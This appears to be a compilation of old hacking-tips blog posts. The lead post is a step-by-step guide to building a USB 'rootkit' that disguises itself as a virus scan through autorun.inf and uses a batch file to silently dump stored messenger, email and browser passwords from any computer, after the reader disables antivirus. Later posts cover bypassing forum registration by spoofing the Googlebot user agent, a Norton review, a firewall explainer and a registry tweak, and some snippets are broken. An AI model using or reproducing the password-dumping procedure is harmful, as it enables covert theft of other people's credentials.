How to Sniff Passwords Using USB Drive

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

 MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt 

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

NOTE: This procedure will only recover the stored passwords (if any) on the Computer. and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Enter and Browse any Forum without registering

Sometimes it so happens that, you are in search of any software or files like doc or pdf, and come across Forums, where members of that forum post replies to that post. But the problem is, you will not be able to see the post or sometimes you won’t be able to see the contents of the forum. The forum ask you to register and then view the posts.

Whenever you need any information for which you are eager to know about and then Forum will ask you to register and login and then only you will be able to see the contents. You will probably find some another alternative rather than registering (then let it be free!) to any website. After registering, there is no guarantee to get complete and correct information so, why not try to get in and browse everything without registering?

I am not recommending you not to register at any forum. Forums are very useful these days as they are very interactive and interesting, where you connect to other peoples who share their own genuine reviews. But it is also good if you first test and then go ahead and register youself.

These websites generally doesn’t allow unregistered users or guests to enter but they do allow “Google Bot” or any other search engine bot to enter for crawling purposes

You will need to change user agent to Google bot for browsing forums.

What you need is Firefox Browser and User Agent Switcher [Serch On Google] After installing, create another user agent from the options menu of the addon.
Select User Agent from the left sidebar and click Add. Now in the description field type:


and in user agent field type:


Googlebot/2.1 (+

Now Start browsing by selecting the user agent as Google Bot.

How to Edit PDF Files For Free

According to Google today there are over 450 million+ Pdf files available online, The reason why they are so popular because they are smaller in size than the source document and can easily preserve the original formatting

PDF files are read only by default but there are some methods through which we can edit PDF files, There are lots of Paid softwares claiming to edit Pdf files but why to go for them as we have a free alternatives

How to Edit PDF Files For Free

Here is how you can edit PDF files for free:


PDfill is a small software for windows which can create, update and merge existing PDF files for free, it requires Java runtime to work

2.Open Office Toolbox

Open office toolbox also includes support for annotations, shapes, images, tables, charts, etc


Inkscape is a very popular PDF editing software With Inkscape, you can select any object on a PDF page including text, graphics, tables, etc.

How to Hack Facebook Chat

Here is step by step tutorial that explains how to hack facebook chat application . Using this hack you’ll be able to chat and browse other pages.

1) Log in to your facebook account

2) Type into the address bar3) Bookmark this page , you can give any name , in this example i give chat4) Right click on saved bookmark and go to Properties5)Check load this bookmark in the sidebar and click on Save Changes6) Launch saved bookmark . Now you can chat and browse other pages at the same time.

Norton Internet Security 2011

Ever since the programmers at Norton went back to the drawing board, Symantec has been on a roll with their Antivirus and Internet Security Suites. Two years since they revamped and reprogrammed the application’s security structure, Norton as unassumingly progressed in terms of quality and performance.

When it comes to product installation, there is no other security suite that matches the speed of the Norton Antivirus and Internet Security Suite. The whole installation takes approximately a minute, and moreover, it doesn’t require a restart unlike most other security suites. What’s surprising is the level of detail that goes into each new release year after year. Each new iteration of Norton feels a lot easier to use than its predecessor. If you take a closer look, however, almost all features remain the same, and only the layout has been reshuffled and changed to a certain extent. That’s what a redesigned interface can do to a user’s perception. Moreover, eliminating what is not of importance, such as the CPU and Norton usage meter seen in version 2010 allows you to focus on more important aspects of the security suite. While most aspects of the interface remain the same, the 2011 version features a world map at the bottom that displays a live feed of the cyber-threat activity that Norton has blocked in the last 24 hours. Even though it’s not of great importance, it fills up an otherwise static and wasted space.Users get a detailed view of files that are downloaded, infected as well as installed. Process alerts such as memory/CPU consumption are also reported.

User accessibility is another aspect that has been implemented very well. For instance, the Online Family protection and Online Backup that were hidden away in sub-menus of the application settings have now been placed at the bottom of the menu screen. The Online Family safety comes as a separate package that allows you to monitor as well as take control of the browsing activity of other users within the system. A new addition to the security suite is the Norton Safe Web. Its basic purpose is to check for fraudulent and risky websites before you access them.

All aspects of the security suite are so well laid out that you would just need to glance through the interface to know which settings are active or disabled. Furthermore, the application still makes uses of the flip function that basically turns the interface 180 degrees to give a more detailed view of the overall RAM and CPU usage. Here, the user also gets to view the total number of threats detected, downloads/program installation, and number of quick scans run. Alerts can be viewed once the ‘Performance’ link is clicked. Norton Insight Network is a cloud-based service that keeps track of legitimate files as well as files that are known to disrupt the system.

The application features an all new System Insight 2.0, Download Insight 2.0 and an improved SONAR 3 engine. Apart from its application monitoring ability, System Insight 2.0 now alerts users as and when it detects a program overusing system resources. This is a nice addition as it gives the user immediate knowledge of which file is crunching on the available system resources.

System Insight also lets you view system activities such as application installation/downloads, disk optimization, threat detection and quick scans. Tabs are also placed at the top of the graph, where you can get hold of details for the current month and for the last two months. The Optimize option improves the boot time of your computer by rearranging file fragments into adjacent and contiguous clusters. If you take a closer look at the application settings, NIS 2011 now comes with features that gives administrators control over security settings.The new interface lets you enable or disable features in a snap.

Administrators can now either allow users to change settings, or disable ‘non-admin’ users from accessing application settings. In addition, application settings can also be password-protected to prevent unauthorized users from changing the security settings. In terms of memory consumption, the program left a very small footprint when idle; less than 15 MB.

NIS 2011 might seem like just a redesigned product, but it does come with updated features such as System Insight, Download Insight and a newly improved SONAR 3 engine that enhances the speed, efficiency and security of the system. With certification from AV-Comparatives, ICSA and West Coast Labs, you simply cannot go wrong with Norton Internet Security 2011.

At Rs. 1,220, it may seem a little steep but you can’t beat the protection.

How Firewalls Work

If you have been using Internet on a regular basis or working in a large company and surf the Internet while you are at work, you must have surely come across the term firewall. You might have also heard of people saying “firewalls protect their computer from web attacks and hackers” or “a certain website has been blocked by firewall in their work place”. If you have ever wondered to know what exactly is this firewall and how it works, here we go. In this post I will try to explain “How firewalls work” in a layman’s terms.

How Firewalls Work

Firewalls are basically a barrier between your computer (or a network) and the Internet (outside world). A firewall can be simply compared to a security guard who stands at the entrance of your house and filters the visitors coming to your place. He may allow some visitors to enter while denying others whom he suspects of being intruders. Similarly a firewall is a software program or a hardware device that filters the information (packets) coming through the Internet to your personal computer or a computer network.

Firewalls may decide to allow or block network traffic between devices based on the rules that are pre-configured or set by the firewall administrator. Most personal firewalls such as Windows firewall operate on a set of pre-configured rules that are most suitable under normal circumstances so that the user need not worry much about configuring the firewall.

Personal firewalls are easy to install and use and hence preferred by end-users for use on their personal computers.  However large networks and companies prefer those firewalls that have plenty of options to configure so as to meet their customized needs. For example, a company may set up different firewall rules for FTP servers, Telnet servers and Web servers. In addition the company can even control how the employees connect to the Internet by blocking access to certain websites or restricting the transfer of files to other networks. Thus in addition to security, a firewall can give the company a tremendous control over how people use the network.

Firewalls use one or more of the following methods to control the incoming and outgoing traffic in a network:

1. Packet Filtering: In this method packets (small chunks of data) are analyzed against a set of filters. Packet filters has a set of rules that come with accept and deny actions which are pre-configured or can be configured manually by the firewall administrator. If the packet manages to make it through these filters then it is allowed to reach the destination; otherwise it is discarded.

2. Stateful Inspection: This is a newer method that doesn’t analyze the contents of the packets. Instead it compares certain key aspects of each packet to a database of trusted source. Both incoming and outgoing packets are compared against this database and if the comparison yields a reasonable match, then the packets are allowed to travel further. Otherwise they are discarded.

Firewall Configuration

Firewalls can be configured by adding one or more filters based on several conditions as mentioned below:

1. IP addresses: In any case if an IP address outside the network is said to be unfavorable, then it is possible to set  filter to block all the traffic to and from that IP address. For example, if a cetain IP address is found to be making too many connections to a server, the administrator may decide to block traffic from this IP using the firewall.

2. Domain names: Since it is difficult to remember the IP addresses, it is an easier and smarter way to configure the firewalls by adding filters based on domain names. By setting up a domain filter, a company may decide to block all access to certain domain names, or may provide access only to a list of selected domain names.

3. Ports/Protocols: Every service running on a server is made available to the Internet using numbered ports, one for each service. In simple words, ports can be compared to virtual doors of the server through which services are made available. For example, if a server is running a Web (HTTP) service then it will be typically available on port 80. In order to avail this service, the client needs to connect to the server via port 80. Similarly different services such as Telnet (Port 23), FTP (port 21) and SMTP (port 25) services may be running on the server. If the services are intended for the public, they are usually kept open. Otherwise they are blocked using the firewall so as to prevent intruders from using the open ports for making unauthorized connections.

4. Specific words or phrases: A firewall can be configured to filter one or more specific words or phrases so that, both the incoming and outgoing packets are scanned for the words in the filter. For example, you may set up a firewall rule to filter any packet that contains an offensive term or a phrase that you may decide to block from entering or leaving your network.

Hardware vs. Software Firewall

Hardware firewalls provide higher level of security and hence preferred for servers where security has the top most priority whereas, the software firewalls are less expensive and are most preferred in home computers and laptops. Hardware firewalls usually come as an in-built unit of a router and provide maximum security as it filters each packet in the hardware level itself even before it manages to enter your computer. A good example is the Linksys Cable/DSL router.

Why Firewall?

Firewalls provide security over a number of online threats such as Remote login, Trojan backdoors, Session hijacking, DOS & DDOS attacks, viruses, cookie stealing and many more. The effectiveness of the security depends on the way you configure the firewall and how you set up the filter rules. However major threats such as DOS and DDOS attacks may sometimes manage to bypass the firewalls and do the damage to the server. Even though firewall is not a complete answer to online threats, it can most effectively handle the attacks and provide security to the computer up to the maximum possible extent.

My View : Zone Alarm is the best firewall out there on the Internet.

Display legal notice on startup:Win XP Hack

Wanna tell your friends about the do’s and dont’s in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.


“legalnoticecaption”=”enter your notice caption”
“legalnoticetext”=”enter your legal notice text”

Great Trick, I am using this one currently ….


“legalnoticecaption”=”Mann’s Cyberdyne Security”
“legalnoticetext”=”Authorized Personnel Only”

Download complete websites to your desktop and surf them offline.

Website eXtractor saves you time and effort by downloading entire Internet sites (or the sections you stipulate) to your hard drive.

Whether you browse the web for research, work, or fun, there’s nothing worse than having to wait for page after page to load in Internet Explorer or Netscape Navigator (or in other popular browsers). The problem is they will only load one page at a time. So if you are viewing a large website with a thousand pages, you’d have to click the mouse a thousand times … and … choose a directory/folder a thousands times when you want to save each file. You end up spending a lot of time waiting around and not enough time reading or viewing pages on the Internet.

Note: Using a regular browser to surf large websites or photo galleries takes the fun out of web browsing and makes research a real chore.

But now, with WebSite eXtractor, you can download whole websites (or parts of them) in one go to your computer. You can then view the whole site offline at your leisure – and you can whiz through the saved pages at lightning speed.

WebSite eXtractor is a great tool for researchers, journalists, students, equity analysts, business and marketing executives – as well as for those who want to browse family websites containing digital photo albums.

Advantages :

  • Transfer whole websites to CD-ROM or floppy
  • Another big benefit of the program is it changes html-links to relative names. In other words, it turns web addresses (URLs) into addresses that work on your computer.
  • Researchers, writers, and journalists can easily archive reference material from the Internet.
  • The program can download up to 100 files at a time, which saves you a huge amount of time compared to ordinary browsers.
  • Website eXtractor automatically lets you download any files that were not copied due to transfer errors or bad connections.

To download the full version use the given torrent :

If you dont have torrent client download from here :